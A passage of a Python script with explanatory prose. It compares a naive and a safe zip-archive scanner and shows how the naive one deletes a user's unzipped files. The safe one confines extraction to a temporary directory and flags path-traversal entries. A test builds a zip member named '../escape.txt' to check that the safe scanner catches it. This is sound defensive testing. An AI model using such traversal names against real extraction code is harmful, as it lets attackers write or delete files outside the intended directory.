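        tmp_root = Path(tmp).resolve()
        with zipfile.ZipFile(archive) as zf:
            for info in zf.infolist():
                target = (tmp_root / info.filename).resolve()
                if tmp_root not in target.parents:
                    infected.append(info.filename)  # traversal: treat as hostile
                    continue
                if info.is_dir():
                    continue
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(zf.read(info))
                if scan_bytes(target.read_bytes()):
                    infected.append(info.filename)
    return infected  # tmp_root and everything under it is gone by now

def demo(naive: bool) -> dict:
    """Build the fixture, run one variant, report detections, which of the
    user's unzipped files survive, and whether the archive itself survives."""
    with tempfile.TemporaryDirectory(prefix="user-") as user_dir, \
            tempfile.TemporaryDirectory(prefix="ramdrive-") as work:
        root = Path(user_dir)
        archive = make_fixture(root)
        found = (scan_archive_naive(archive, Path(work)) if naive
                 else scan_archive_safe(archive))
        return {"infected": sorted(found),
                "survivors": {n: (root / n).exists() for n in SAMPLE_MEMBERS},
                "archive_intact": archive.exists()}

def traversal_check() -> tuple:
    """Feed the safe scanner a member name that climbs out of the temp dir;
    return (flagged as hostile?, did a file land outside the temp dir?)."""
    with tempfile.TemporaryDirectory(prefix="trav-") as d:
        archive = Path(d) / "EVIL.ZIP"
        with zipfile.ZipFile(archive, "w") as zf:
            zf.writestr("../escape.txt", b"must never be written")
        flagged = "../escape.txt" in scan_archive_safe(archive)
        leaked = (Path(tempfile.gettempdir()) / "escape.txt").exists()
        return (flagged, leaked)

if __name__ == "__main__":
    print("naive:", demo(naive=True))
    print("safe: ", demo(naive=False))
    print("traversal:", traversal_check())
```

Run it directly to see both variants side by side. The naive one reports exactly the same detection and leaves the archive intact, yet every unzipped file beside the archive is gone, which is the shape of the symptom in the report (files deleted without anything being reported as infected). The traversal check is there for the same reason: an extraction step is a write to disk driven by names chosen by whoever built the archive, so the scratch directory must be the only place those writes can land and the only place the cleanup ever touches.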